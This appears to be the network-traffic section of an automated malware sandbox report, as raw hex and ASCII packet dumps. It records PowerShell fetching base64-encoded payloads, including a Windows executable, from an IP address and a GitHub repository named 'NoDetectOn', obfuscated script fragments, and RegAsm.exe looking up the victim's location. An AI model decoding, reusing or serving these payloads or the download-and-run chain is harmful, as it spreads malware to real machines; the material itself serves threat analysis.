                                                                                                                          Oct 5, 2024 14:58:15.704552889 CEST1236INData Raw: 00 4e 00 6b 00 57 00 6d 00 78 00 51 00 41 00 6b 00 51 00 5a 00 73 00 4b 00 69 00 68 00 55 00 4c 00 66 00 41 00 65 00 50 00 4b 00 55 00 61 00 4c 00 22 00 0d 00 0a 00 71 00 57 00 4b 00 63 00 43 00 6a 00 47 00 57 00 70 00 68 00 6e 00 41 00 4e 00 68
                                                                                                                          Data Ascii: NkWmxQAkQZsKihULfAePKUaL"qWKcCjGWphnANhxWekfdddKznA = "tcBKufeGklcuWKbPWQbLdLoAUC"cQWWGNPHfTmmdNoWtLhKZBKPZg = "boiIc
                                                                                                                          Oct 5, 2024 14:58:15.704591036 CEST1236INData Raw: 00 0a 00 42 00 5a 00 43 00 57 00 57 00 52 00 4c 00 41 00 69 00 66 00 55 00 6b 00 6a 00 51 00 68 00 68 00 4b 00 70 00 51 00 4e 00 62 00 6b 00 6f 00 7a 00 62 00 6b 00 20 00 3d 00 20 00 22 00 76 00 69 00 70 00 65 00 72 00 69 00 6e 00 61 00 75 00 62
                                                                                                                          Data Ascii: BZCWWRLAifUkjQhhKpQNbkozbk = "viperinaubUnUioKrKLjOjApubepOWWh"tdUTccZoLmmQCWfdUBLTkgzkZb = "WkmLuoIUGninPKPCKsZlsGkRc
                                                                                                                          Oct 5, 2024 14:58:15.709722042 CEST1236INData Raw: 00 72 00 4c 00 68 00 69 00 50 00 47 00 4a 00 20 00 3d 00 20 00 22 00 63 00 57 00 50 00 72 00 4c 00 57 00 61 00 69 00 57 00 63 00 4c 00 67 00 57 00 62 00 4b 00 6b 00 68 00 57 00 69 00 57 00 57 00 41 00 63 00 70 00 50 00 63 00 22 00 0d 00 0a 00 4b
                                                                                                                          Data Ascii: rLhiPGJ = "cWPrLWaiWcLgWbKkhWiWWAcpPc"KliLbWHiWBPcNUnKLcAiKIcLbs = "bPjbKoliWomkNzWmLnKcKRcpKK"NhjizcLTNHukncpLNNKbzi


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          1192.168.2.224916751.83.251.113803596C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Oct 5, 2024 14:58:23.784620047 CEST77OUTGET /650/WERRFF.txt HTTP/1.1
                                                                                                                          Host: 51.83.251.113
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Oct 5, 2024 14:58:24.432117939 CEST1236INHTTP/1.1 200 OK
                                                                                                                          Date: Sat, 05 Oct 2024 12:58:24 GMT
                                                                                                                          Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                          Last-Modified: Thu, 03 Oct 2024 04:26:27 GMT
                                                                                                                          ETag: "a1000-6238af542073c"
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          Content-Length: 659456
                                                                                                                          Keep-Alive: timeout=5, max=100
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Content-Type: text/plain
                                                                                                                          Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 38 67 4b 50 49 79 44 62 38 77 45 50 73 77 44 43 37 77 2f 4f 63 76 44 73 37 51 35 4f 30 74 44 56 37 41 7a 4f 51 6f 44 37 36 77 73 4f 73 71 44 6a 36 77 6d 4f 45 70 44 4b 36 41 68 4f 49 6f 44 42 36 41 51 4f 38 6e 44 2b 35 51 66 4f 67 4f 44 4e 7a 41 6a 4d 6b 4b 44 6f 79 51 6f 4d 41 4b 44 66 79 41 6e 4d 59 4a 44 53 79 67 6a 4d 6f 49 44 47 78 67 65 4d 59 48 44 31 78 41 64 4d 4d 48 44 79 78 51 63 4d 41 48 44 76 78 67 62 4d 73 47 44 71 78 51 61 4d 67 47 44 6e 78 67 5a 4d 55 47 44 6b 78 77 59 4d 49 47 44 65 78 51 58 4d 77 42 41 41 41 77 49 41 48 41 42 41 41 41 67 50 6b 36 44 6b 2b 67 6f 50 30 35 44 62 2b 51 6d 50 63 35 44 57 2b 41 6c 50 38 34 44 4e 2b 41 69 50 59 34 44 45 2b 67 67 50 45 34 44 41 39 77 66 50 34 33 44 38 39 77 65 50 6b 33 44 30 39 67 63 50 30 32 44 72 39 51 61 50 63 32 44 65 39 41 [TRUNCATED]
                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA8gKPIyDb8wEPswDC7w/OcvDs7Q5O0tDV7AzOQoD76wsOsqDj6wmOEpDK6AhOIoDB6AQO8nD+5QfOgODNzAjMkKDoyQoMAKDfyAnMYJDSygjMoIDGxgeMYHD1xAdMMHDyxQcMAHDvxgbMsGDqxQaMgGDnxgZMUGDkxwYMIGDexQXMwBAAAwIAHABAAAgPk6Dk+goP05Db+QmPc5DW+AlP84DN+AiPY4DE+ggPE4DA9wfP43D89wePk3D09gcP02Dr9QaPc2De9AXPo1DZ9gUPo0DJ9gAPozDy8gKPIyDa8gEPowDC7g+OIvDq7g4OotDS7gyOIoD66gsOoqDi6gmOIpDK6QiOIkD65gcOomDi5wWOolDY5AUOgkDA4AOOAjDo4AIOghDQ4ACOEcD+3g9N4eDm3g3NYdDO3ghN4bD52wtNYbD02gsNAbDv2ApNIaDf2glNIZDR2giNkYDD2ggNAUD51AeNYXDp1gZN4VDb1AUNsUDJ1ASNcUDF1wQNEQD80gONkTD40gNNQTDy0QLNsSDm0AJNMSDi0AIN4RDc0wFNURDU0gENARDO0QDNYQDFzw/MsPDuzA7MkODlzA2MYNDTzwzMIMDAyQvMkLDsygqMcKDjyglMQJDRyQjMAED+xweMcHDqxAaMUGDhxAVMIFDPxwCM4DD8wQOMcDD1wAKMYCDjwQIM8BDSwAEM0ADLwQCAAEAkAYA4AAAA/A/Po/D3/w8PY+Dk/Q4P09DQ/gzPs8DH/wgP47Dt+wqPg6Dk+AoPs5DK+AiPU4DB9AdPInDe5AWOYlDV5AVOAlDP5wSOUkDD5gQOEkDA4wPO4jD64QOOUjDv4QLOwiDr4
                                                                                                                          Oct 5, 2024 14:58:24.432198048 CEST1236INData Raw: 67 4b 4f 6b 69 44 6f 34 41 4a 4f 4d 69 44 66 34 51 47 4f 63 68 44 57 34 51 46 4f 51 68 44 54 34 77 44 4f 34 67 44 4b 34 41 42 4f 49 67 44 42 34 41 77 4e 38 66 44 2b 33 67 2b 4e 6b 66 44 31 33 77 37 4e 30 65 44 73 33 77 36 4e 63 65 44 6d 33 67 34
                                                                                                                          Data Ascii: gKOkiDo4AJOMiDf4QGOchDW4QFOQhDT4wDO4gDK4ABOIgDB4AwN8fD+3g+NkfD13w7N0eDs3w6NceDm3g4NEeDd3w1NUdDU3A0NocDI3wxNYcDF3QgNsbD62AtNIbDx2AsN8aDu2gqNkaDl2wnN0ZDc2AmNcZDT2QjNsYDK2QiNUYDE2AQNoXD41wdNYXD11QcNAXDs1gZNQWDj1gYNEWDd1AXNgVDS1AUN8UDO1gSNkUDF0wPN
                                                                                                                          Oct 5, 2024 14:58:24.432235003 CEST1236INData Raw: 78 44 52 38 77 44 50 30 77 44 4c 38 51 43 50 63 77 44 46 38 77 41 50 45 73 44 2f 37 51 2f 4f 73 76 44 35 37 77 39 4f 55 76 44 7a 37 51 38 4f 38 75 44 74 37 77 36 4f 6b 75 44 6e 37 51 35 4f 4d 75 44 68 37 77 33 4f 30 74 44 62 37 51 32 4f 63 74 44
                                                                                                                          Data Ascii: xDR8wDP0wDL8QCPcwDF8wAPEsD/7Q/OsvD57w9OUvDz7Q8O8uDt7w6OkuDn7Q5OMuDh7w3O0tDb7Q2OctDV7w0OEtDP7QzOssDJ7wxOUsDD7QgO8rD96wuOkrD36QtOMrDx6wrO0qDr6QqOcqDl6woOEqDf6QnOspDZ6wlOUpDT6QkO8oDN6wiOkoDH6QhOMoDB5wfO0nD75QeOcnD15wcOEnDv5QbOsmDp5wZOUmDj5QYO8lDd
                                                                                                                          Oct 5, 2024 14:58:24.432267904 CEST672INData Raw: 77 77 4f 49 41 41 41 41 41 4f 41 46 41 4f 41 41 41 41 4e 55 53 44 6b 30 77 49 4e 49 53 44 68 30 41 49 4e 38 52 44 65 30 51 48 4e 77 52 44 62 30 67 47 4e 6b 52 44 59 30 77 46 4e 59 52 44 55 30 77 45 4e 49 52 44 52 30 41 45 4e 38 51 44 4e 30 67 43
                                                                                                                          Data Ascii: wwOIAAAAAOAFAOAAAANUSDk0wINISDh0AIN8RDe0QHNwRDb0gGNkRDY0wFNYRDU0wENIRDR0AEN8QDN0gCNkQDI0wBNYQDF0ABNMQDB0AwM8PD+zQ/MwPD7zg+MgPD2AAAAcBQBQDgOsrD66QuOgrD36gtOUrD06wsOIrDx6AsO8qDu6QrOwqDr6gqOkqDo6wpOYqDl6ApOMqDi6QoOAqDf6gnO0pDc6wmOopDZ6AmOcpDW6QlO
                                                                                                                          Oct 5, 2024 14:58:24.432302952 CEST1236INData Raw: 67 77 4d 41 49 44 2b 79 41 76 4d 6f 4c 44 34 79 67 74 4d 51 4c 44 79 79 41 73 4d 34 4b 44 73 79 67 71 4d 67 4b 44 6d 79 41 70 4d 49 4b 44 67 79 67 6e 4d 77 4a 44 61 79 41 6d 4d 59 4a 44 55 79 67 6b 4d 41 4a 44 4f 79 41 6a 4d 6f 49 44 49 79 67 68
                                                                                                                          Data Ascii: gwMAID+yAvMoLD4ygtMQLDyyAsM4KDsygqMgKDmyApMIKDgygnMwJDayAmMYJDUygkMAJDOyAjMoIDIyghMQIDCyAQM4HD8xgeMgHD2xAdMIHDwxgbMwGDqxAaMYGDkxgYMAGDexAXMoFDYxgVMQFDSxAUM4EDMxgSMgEDGxARMIEDAwgPMwDD6wAOMYDD0wgMMADDuwALMoCDowgJMQCDiwAIM4BDcwgGMgBDWwAFMIBDQwgDM
                                                                                                                          Oct 5, 2024 14:58:24.432337046 CEST1236INData Raw: 38 44 4c 2f 51 79 50 63 38 44 46 2f 77 77 50 45 34 44 2f 2b 51 76 50 73 37 44 35 2b 77 74 50 55 37 44 7a 2b 51 73 50 38 36 44 74 2b 77 71 50 6b 36 44 6e 2b 51 70 50 4d 36 44 68 2b 77 6e 50 30 35 44 62 2b 51 6d 50 63 35 44 56 33 77 37 4e 34 65 44
                                                                                                                          Data Ascii: 8DL/QyPc8DF/wwPE4D/+QvPs7D5+wtPU7Dz+QsP86Dt+wqPk6Dn+QpPM6Dh+wnP05Db+QmPc5DV3w7N4eDt3A7NseDq3Q6NgeDn3g5NUeDk3w4NIeDe3Q3NwdDb3g2NkdDY3w1NYdDV3A1NMdDS3Q0NAdDP3gzN0cDM3wyNocDJ3AyNccDG3QhN4bD92AvNcbD22QtNQbDz2gsNEbDw2AkN8YDO2QiNgYDH2ghNUYDE2wgNIUD/
                                                                                                                          Oct 5, 2024 14:58:24.432368994 CEST1236INData Raw: 41 73 4e 32 5a 6a 62 32 6b 52 4e 78 56 44 4c 31 55 52 4e 41 51 7a 31 30 45 4a 4e 62 4e 54 61 7a 38 68 4d 71 45 6a 61 78 6b 42 4d 50 44 44 68 77 73 48 4d 50 41 6a 42 41 41 41 41 4d 42 51 42 67 41 41 41 41 38 54 69 2f 41 6f 50 39 37 7a 73 39 77 62
                                                                                                                          Data Ascii: AsN2Zjb2kRNxVDL1URNAQz10EJNbNTaz8hMqEjaxkBMPDDhwsHMPAjBAAAAMBQBgAAAA8Ti/AoP97zs9wbPM1zF8cCPUsDj7YlOCeDm34jNNXj51UcNNVDL1YBNdTzd0gENeMTty0tMQKjFyQQM7FTNAAAAIBQBQAAAA8j88UDPtwTJ80BPWoTU6UhODkT858dONnDG28SNwXj31wcN6WDq1YZNEWjc1AWNOVDP1oSNYQD10AMN
                                                                                                                          Oct 5, 2024 14:58:24.432401896 CEST1236INData Raw: 4c 44 32 79 4d 73 4d 51 4b 6a 4c 79 63 53 4d 63 46 54 56 41 41 41 41 41 43 41 42 77 43 41 41 41 34 54 4a 39 73 43 50 6c 79 54 55 37 34 32 4f 6f 74 6a 56 37 6f 78 4f 50 6f 7a 65 36 77 53 4f 36 6e 6a 79 33 73 38 4e 74 65 6a 70 33 34 34 4e 48 65 44
                                                                                                                          Data Ascii: LD2yMsMQKjLycSMcFTVAAAAACABwCAAA4TJ9sCPlyTU742OotjV7oxOPoze6wSO6njy3s8Ntejp344NHeDe3g2NhdjI0cFAAAAOAQAoA8TL/ERP03jv9MRPDwTq8YIPQxjP8cwOMvTs7E4OIpz06UsOArzs60pOHqDg68VOvdzc2MqNEajY1QfNSXjw10aNjWjA00ONkTz10wMN2Rjb0kENBRzE0wwM7PT8zc+MgPT0zs8MEPTu
                                                                                                                          Oct 5, 2024 14:58:24.432436943 CEST1236INData Raw: 77 5a 4d 33 46 7a 58 78 63 56 4d 4c 46 54 4f 78 41 53 4d 59 45 54 45 77 34 50 4d 79 44 44 35 77 63 4e 4d 53 44 54 78 77 41 4d 4d 33 43 54 71 77 4d 4b 4d 59 43 6a 6b 77 63 49 4d 2f 42 44 64 77 34 47 4d 64 42 44 57 77 6b 45 4d 57 41 7a 41 41 41 41
                                                                                                                          Data Ascii: wZM3FzXxcVMLFTOxASMYETEw4PMyDD5wcNMSDTxwAMM3CTqwMKMYCjkwcIM/BDdw4GMdBDWwkEMWAzAAAAAgCABABwPt/T4/Q9PP/Tm/c4PD5Tx+4qPY0jz9YbPn1DX9MAPizzO7o+OWvzy7A8O7uTs7w6OSuzd7o0Oyoj+6QtO3qTg6clO4gjG4UxNnfjx3E8NOezh3g2NedDW3kzNvUzO1ADN3Tj70MIN9Rzd00GNZQTBz8/M
                                                                                                                          Oct 5, 2024 14:58:24.432472944 CEST1236INData Raw: 36 6a 6a 2b 6b 6f 50 45 36 44 65 2b 45 6c 50 4d 35 7a 52 2b 73 6a 50 58 34 6a 45 2b 30 67 50 42 30 54 33 39 67 64 50 54 33 6a 79 39 4d 61 50 65 32 54 6d 39 6b 59 50 6e 31 54 57 39 30 55 50 2b 30 6a 49 38 67 50 50 77 7a 54 32 38 6b 4d 50 4e 79 54
                                                                                                                          Data Ascii: 6jj+koPE6De+ElPM5zR+sjPX4jE+0gPB0T39gdPT3jy9MaPe2Tm9kYPn1TW90UP+0jI8gPPwzT28kMPNyTg60BOijDt44KOiejZ3I2NedjW3Y1NSdjT3o0NGdjQ34zN6cjN3IzNucjK3YyNicjH3oxNWcjE34wNKcjB3IgN+bj+2YvNybj72oOAAAApAMAgAAAA0IOAAAADAMAcA8DU+gtPFzDL8gCPkwDI8sxOWvDg7w3O4tDd
                                                                                                                          Oct 5, 2024 14:58:24.437521935 CEST1236INData Raw: 34 35 4f 57 75 6a 54 37 67 30 4f 77 73 6a 43 36 6b 76 4f 76 72 44 30 36 55 53 4f 30 6c 6a 42 34 6b 50 4f 30 6a 7a 30 34 34 4d 4f 4a 6a 44 75 34 6f 49 4f 71 67 54 41 33 49 37 4e 61 64 54 51 33 6b 7a 4e 53 63 54 42 32 63 71 4e 64 61 7a 69 32 55 6f
                                                                                                                          Data Ascii: 45OWujT7g0OwsjC6kvOvrD06USO0ljB4kPO0jz044MOJjDu4oIOqgTA3I7NadTQ3kzNScTB2cqNdazi2UoN+ZTa2MkNyYjI2YhNDUD81EaN1RT108MNuSTq08JNUSji0AIN6RDd04GNoRjV0wENERTO0MDNtQjF04wMRPTyzs7MxOjozc5MSODjzU4MyNjVz00MINTOz0yMaMjEy4vM1LD8ycuMiLz2ywsMGLTuxMeMZHzzxUcM


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          2192.168.2.2249172178.237.33.50803728C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Oct 5, 2024 14:58:28.213803053 CEST71OUTGET /json.gp HTTP/1.1
                                                                                                                          Host: geoplugin.net
                                                                                                                          Cache-Control: no-cache
                                                                                                                          Oct 5, 2024 14:58:28.812913895 CEST1170INHTTP/1.1 200 OK
                                                                                                                          date: Sat, 05 Oct 2024 12:58:28 GMT
                                                                                                                          server: Apache
                                                                                                                          content-length: 962
                                                                                                                          content-type: application/json; charset=utf-8
                                                                                                                          cache-control: public, max-age=300
                                                                                                                          access-control-allow-origin: *
                                                                                                                          Data Raw: 7b 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 71 75 65 73 74 22 3a 22 38 2e 34 36 2e 31 32 33 2e 33 33 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 73 74 61 74 75 73 22 3a 32 30 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 65 6c 61 79 22 3a 22 32 6d 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 72 65 64 69 74 22 3a 22 53 6f 6d 65 20 6f 66 20 74 68 65 20 72 65 74 75 72 6e 65 64 20 64 61 74 61 20 69 6e 63 6c 75 64 65 73 20 47 65 6f 4c 69 74 65 32 20 64 61 74 61 20 63 72 65 61 74 65 64 20 62 79 20 4d 61 78 4d 69 6e 64 2c 20 61 76 61 69 6c 61 62 6c 65 20 66 72 6f 6d 20 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 27 3e 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 3c 5c 2f 61 3e 2e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f [TRUNCATED]
                                                                                                                          Data Ascii: { "geoplugin_request":"8.46.123.33", "geoplugin_status":200, "geoplugin_delay":"2ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"New York", "geoplugin_region":"New York", "geoplugin_regionCode":"NY", "geoplugin_regionName":"New York", "geoplugin_areaCode":"", "geoplugin_dmaCode":"501", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"40.7123", "geoplugin_longitude":"-74.0068", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/New_York", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          0192.168.2.2249166185.199.111.1334433596C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-10-05 12:58:21 UTC128OUTGET /NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V.txt HTTP/1.1
                                                                                                                          Host: raw.githubusercontent.com
                                                                                                                          Connection: Keep-Alive
                                                                                                                          2024-10-05 12:58:21 UTC897INHTTP/1.1 200 OK
                                                                                                                          Connection: close
                                                                                                                          Content-Length: 2935468
                                                                                                                          Cache-Control: max-age=300
                                                                                                                          Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                                                                          Content-Type: text/plain; charset=utf-8
                                                                                                                          ETag: "df9ff7aedbae4b4f50e2ae3a8f13fd0b84c66fbd35e7ac0df91a7a47b720c032"
                                                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                          X-Frame-Options: deny
                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                          X-GitHub-Request-Id: DDF4:38977D:9189:AF2E:670136A5
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          Date: Sat, 05 Oct 2024 12:58:21 GMT
                                                                                                                          Via: 1.1 varnish
                                                                                                                          X-Served-By: cache-ewr-kewr1740032-EWR
                                                                                                                          X-Cache: HIT
                                                                                                                          X-Cache-Hits: 0
                                                                                                                          X-Timer: S1728133101.487614,VS0,VE9
                                                                                                                          Vary: Authorization,Accept-Encoding,Origin
                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                          Cross-Origin-Resource-Policy: cross-origin
                                                                                                                          X-Fastly-Request-ID: ab5670ced061c72d1c9b00c80192e034e4fb40ee
                                                                                                                          Expires: Sat, 05 Oct 2024 13:03:21 GMT
                                                                                                                          Source-Age: 0
                                                                                                                          2024-10-05 12:58:21 UTC1378INData Raw: 54 56 71 51 41 41 4d 41 41 41 41 45 41 41 41 41 2f 2f 38 41 41 4c 67 41 41 41 41 41 41 41 41 41 51 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 67 41 41 41 41 41 34 66 75 67 34 41 74 41 6e 4e 49 62 67 42 54 4d 30 68 56 47 68 70 63 79 42 77 63 6d 39 6e 63 6d 46 74 49 47 4e 68 62 6d 35 76 64 43 42 69 5a 53 42 79 64 57 34 67 61 57 34 67 52 45 39 54 49 47 31 76 5a 47 55 75 44 51 30 4b 4a 41 41 41 41 41 41 41 41 41 42 51 52 51 41 41 54 41 45 44 41 41 4f 50 39 57 59 41 41 41 41 41 41 41 41 41 41 4f 41 41 44 69 45 4c 41 54 41 41 41 4a 41 68 41 41 41 47 41 41 41 41 41 41 41 41 33 71 38 68 41 41 41 67 41 41 41 41 77 43 45 41 41 41 42 41 41 41 41 67 41 41 41 41 41 67 41
                                                                                                                          Data Ascii: TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDAAOP9WYAAAAAAAAAAOAADiELATAAAJAhAAAGAAAAAAAA3q8hAAAgAAAAwCEAAABAAAAgAAAAAgA
                                                                                                                          2024-10-05 12:58:21 UTC1378INData Raw: 41 41 42 67 41 41 41 44 67 41 41 41 41 41 4b 67 49 44 66 51 55 41 41 41 51 67 41 41 41 41 41 48 36 45 45 41 41 45 65 30 41 51 41 41 51 35 30 76 2f 2f 2f 79 59 67 41 41 41 41 41 44 6a 48 2f 2f 2f 2f 41 45 59 6f 45 67 41 41 42 67 49 6f 43 51 41 41 42 69 67 42 41 41 41 4b 4b 67 41 41 45 7a 41 44 41 47 30 41 41 41 41 42 41 41 41 52 49 41 45 41 41 41 44 2b 44 67 41 41 4f 41 41 41 41 41 44 2b 44 41 41 41 52 51 49 41 41 41 41 46 41 41 41 41 47 51 41 41 41 44 67 41 41 41 41 41 41 69 67 55 41 41 41 47 41 32 38 46 41 41 41 47 4b 42 55 41 41 41 59 71 46 69 6f 43 4b 42 4d 41 41 41 59 44 4b 42 4d 41 41 41 59 6f 41 67 41 41 43 6a 6e 6f 2f 2f 2f 2f 49 41 41 41 41 41 42 2b 68 42 41 41 42 48 73 75 45 41 41 45 4f 72 44 2f 2f 2f 38 6d 49 41 41 41 41 41 41 34 70 66 2f 2f 2f
                                                                                                                          Data Ascii: AABgAAADgAAAAAKgIDfQUAAAQgAAAAAH6EEAAEe0AQAAQ50v///yYgAAAAADjH////AEYoEgAABgIoCQAABigBAAAKKgAAEzADAG0AAAABAAARIAEAAAD+DgAAOAAAAAD+DAAARQIAAAAFAAAAGQAAADgAAAAAAigUAAAGA28FAAAGKBUAAAYqFioCKBMAAAYDKBMAAAYoAgAACjno////IAAAAAB+hBAABHsuEAAEOrD///8mIAAAAAA4pf///
                                                                                                                          2024-10-05 12:58:21 UTC1378INData Raw: 49 41 45 41 41 41 41 34 6d 66 2f 2f 2f 77 49 4f 42 48 30 4a 41 41 41 45 49 41 41 41 41 41 42 2b 68 42 41 41 42 48 74 61 45 41 41 45 4f 58 33 2f 2f 2f 38 6d 49 41 41 41 41 41 41 34 63 76 2f 2f 2f 7a 49 43 4b 42 6b 41 41 41 59 6f 4a 77 41 41 42 69 6f 41 41 41 41 54 4d 41 4d 41 6b 51 41 41 41 41 4d 41 41 42 45 67 41 77 41 41 41 50 34 4f 41 41 41 34 41 41 41 41 41 50 34 4d 41 41 42 46 42 41 41 41 41 41 59 41 41 41 41 46 41 41 41 41 4c 41 41 41 41 46 49 41 41 41 41 34 41 51 41 41 41 43 6f 52 41 53 67 6b 41 41 41 47 49 41 41 41 41 41 42 2b 68 42 41 41 42 48 73 2f 45 41 41 45 4f 73 72 2f 2f 2f 38 6d 49 41 45 41 41 41 41 34 76 2f 2f 2f 2f 78 45 42 4f 64 4c 2f 2f 2f 38 67 41 41 41 41 41 48 36 45 45 41 41 45 65 33 77 51 41 41 51 36 70 50 2f 2f 2f 79 59 67 41 41 41
                                                                                                                          Data Ascii: IAEAAAA4mf///wIOBH0JAAAEIAAAAAB+hBAABHtaEAAEOX3///8mIAAAAAA4cv///zICKBkAAAYoJwAABioAAAATMAMAkQAAAAMAABEgAwAAAP4OAAA4AAAAAP4MAABFBAAAAAYAAAAFAAAALAAAAFIAAAA4AQAAACoRASgkAAAGIAAAAAB+hBAABHs/EAAEOsr///8mIAEAAAA4v////xEBOdL///8gAAAAAH6EEAAEe3wQAAQ6pP///yYgAAA
                                                                                                                          2024-10-05 12:58:21 UTC1378INData Raw: 45 67 41 41 41 41 41 48 36 45 45 41 41 45 65 79 49 51 41 41 51 36 53 66 2f 2f 2f 79 59 67 42 41 41 41 41 44 67 2b 2f 2f 2f 2f 45 51 51 6f 4f 51 41 41 42 6a 72 4d 2f 2f 2f 2f 49 41 41 41 41 41 42 2b 68 42 41 41 42 48 74 6d 45 41 41 45 4f 68 37 2f 2f 2f 38 6d 49 41 41 41 41 41 41 34 45 2f 2f 2f 2f 39 33 45 2f 76 2f 2f 45 51 51 36 58 51 41 41 41 43 41 41 41 41 41 41 66 6f 51 51 41 41 52 37 69 68 41 41 42 44 6b 50 41 41 41 41 4a 69 41 41 41 41 41 41 4f 41 51 41 41 41 44 2b 44 41 55 41 52 51 4d 41 41 41 41 46 41 41 41 41 4b 51 41 41 41 44 6f 41 41 41 41 34 41 41 41 41 41 44 67 77 41 41 41 41 49 41 45 41 41 41 42 2b 68 42 41 41 42 48 73 6f 45 41 41 45 4f 74 48 2f 2f 2f 38 6d 49 41 45 41 41 41 41 34 78 76 2f 2f 2f 78 45 45 4b 44 6f 41 41 41 59 67 41 67 41 41 41
                                                                                                                          Data Ascii: EgAAAAAH6EEAAEeyIQAAQ6Sf///yYgBAAAADg+////EQQoOQAABjrM////IAAAAAB+hBAABHtmEAAEOh7///8mIAAAAAA4E////93E/v//EQQ6XQAAACAAAAAAfoQQAAR7ihAABDkPAAAAJiAAAAAAOAQAAAD+DAUARQMAAAAFAAAAKQAAADoAAAA4AAAAADgwAAAAIAEAAAB+hBAABHsoEAAEOtH///8mIAEAAAA4xv///xEEKDoAAAYgAgAAA
                                                                                                                          2024-10-05 12:58:21 UTC1378INData Raw: 4f 4a 50 2f 2f 2f 38 43 46 48 30 51 41 41 41 45 49 41 55 41 41 41 41 34 67 76 2f 2f 2f 77 4a 37 45 41 41 41 42 43 67 45 41 41 41 72 49 41 45 41 41 41 42 2b 68 42 41 41 42 48 74 63 45 41 41 45 4f 6d 50 2f 2f 2f 38 6d 49 41 45 41 41 41 41 34 57 50 2f 2f 2f 79 6f 71 41 6e 73 50 41 41 41 45 4b 41 55 41 41 43 73 67 41 41 41 41 41 48 36 45 45 41 41 45 65 78 6b 51 41 41 51 35 4e 2f 2f 2f 2f 79 59 67 41 41 41 41 41 44 67 73 2f 2f 2f 2f 41 41 41 6d 66 68 45 41 41 41 51 55 2f 67 45 71 41 41 41 61 66 68 45 41 41 41 51 71 41 43 72 2b 43 51 41 41 62 77 30 41 41 41 6f 71 41 43 72 2b 43 51 41 41 62 77 63 41 41 41 6f 71 41 43 72 2b 43 51 41 41 62 31 30 41 41 41 59 71 41 44 34 41 2f 67 6b 41 41 50 34 4a 41 51 41 6f 62 77 41 41 42 69 6f 36 2f 67 6b 41 41 50 34 4a 41 51 42
                                                                                                                          Data Ascii: OJP///8CFH0QAAAEIAUAAAA4gv///wJ7EAAABCgEAAArIAEAAAB+hBAABHtcEAAEOmP///8mIAEAAAA4WP///yoqAnsPAAAEKAUAACsgAAAAAH6EEAAEexkQAAQ5N////yYgAAAAADgs////AAAmfhEAAAQU/gEqAAAafhEAAAQqACr+CQAAbw0AAAoqACr+CQAAbwcAAAoqACr+CQAAb10AAAYqAD4A/gkAAP4JAQAobwAABio6/gkAAP4JAQB
